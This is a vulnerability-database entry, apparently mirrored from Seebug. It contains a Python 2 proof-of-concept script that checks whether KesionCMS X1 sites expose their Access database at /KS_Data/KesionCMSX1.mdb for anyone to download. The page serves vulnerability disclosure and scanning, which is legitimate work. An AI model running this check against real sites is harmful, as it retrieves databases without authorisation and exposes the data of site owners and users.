Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

KesionCMS X1 /KS_Data/KesionCMSX1.mdb 数据库发现漏洞

🗓️ 18 Sep 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 53 Views

KesionCMS X1 /KS_Data/KesionCMSX1.mdb 数据库发现漏洞, 数据没有加#导致可任意下

Code

                                                #!/usr/bin/env python
# coding=utf-8

#test:

import urllib2

from comm import cmdline
from comm import generic

poc_info = {
    'VulId'       : '1503',                                                      # webvul的ID号
    'Name'        : 'KesionCMS X1 /KS_Data/KesionCMSX1.mdb 数据库发现漏洞 POC',                  # poc的名字,首字母大写
    'AppName'     : 'KesionCMS',                                                    # app名称
    'AppPowerLink': 'http://www.kesion.com',                                      # app官网地址
    'AppVersion'  : 'X1',                                                      # app程序详细版本
    'VulType'     : 'Database Found',                                             # 漏洞类型名称
    'Desc'        : '''
                    数据没有加#导致可任意下载
                    ''', 
    'Author'      : ['wuwh @ Knownsec'],       # 完成人
    'VulDate'     : '2014­08­20',                                     # 漏洞首发时间
    'CreateDate'  : '2014-09-09',                                     # 编写此poc的时间
    'UpdateDate'  : '2014-09-09',                                     # 最后一次更新此poc的时间
    'References'  : ['http://wooyun.org/bugs/wooyun-2014-072949'],           # 与漏洞相关的链接
    'Version'     : '1',                                              # 本poc的版本,一般为1,若有第二次更新改为2,以此类推
}


''' 必填值:io_info 字典必写,记录输入输出信息,名字不可变必须叫io_info,这是个全局变量!!!'''
io_info = {
    'URL'     : '',
    'Mode'    : 'v',   # 默认值为 v 代表 verify
    'Verbose' : False, # 默认值为False代表不打印详细信息
    'Error'   : '',    # 记录poc失败信息
    'Status'  : 0,     # 默认值为0代表poc没执行成功,执行成功必须更新该值为1
    'Result'  : {}
}

def main(io_info): 
    '''interface function, io_info is a global io dict'''
    url = io_info.get('URL','')
    mode = io_info.get('Mode','v')
    verbose = io_info.get('Verbose', False)
    headers_fake = generic.modify_headers(io_info)

    #写自己的代码
    if mode=='v' or mode=='a':
        try:
            payload = "/KS_Data/KesionCMSX1.mdb"
            Database_url = url+payload
            req = urllib2.Request(Database_url)
            content = urllib2.urlopen(req).read()
            if "Standard Jet DB" in content:
                io_info['Status'] = 1
                io_info['Result']['FileInfo'] = {}
                io_info['Result']['FileInfo']['Filename'] = Database_url
                io_info['Result']['FileInfo']['Content'] = 'mdb'
        except Exception, e:
            io_info['Error'] = '[*] ' + str(e)

    
if __name__=="__main__":
    # usage表示poc命令行运行的使用帮助,如果留空则使用默认的
    # 如果没有特殊命令行附加参数,则argvs可为空,默认参数有-u/--url,-m/--mode,-v
    cmdline.main(io_info, usage='', argvs=[]) 
    if io_info['Verbose']:
        print '\n[*] Init ...\n'
    main(io_info)
    print generic.output(io_info)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Sep 2014 00:00Current
7.1High risk
Vulners AI Score7.1
kesioncmsx1数据库发现漏洞数据下载
53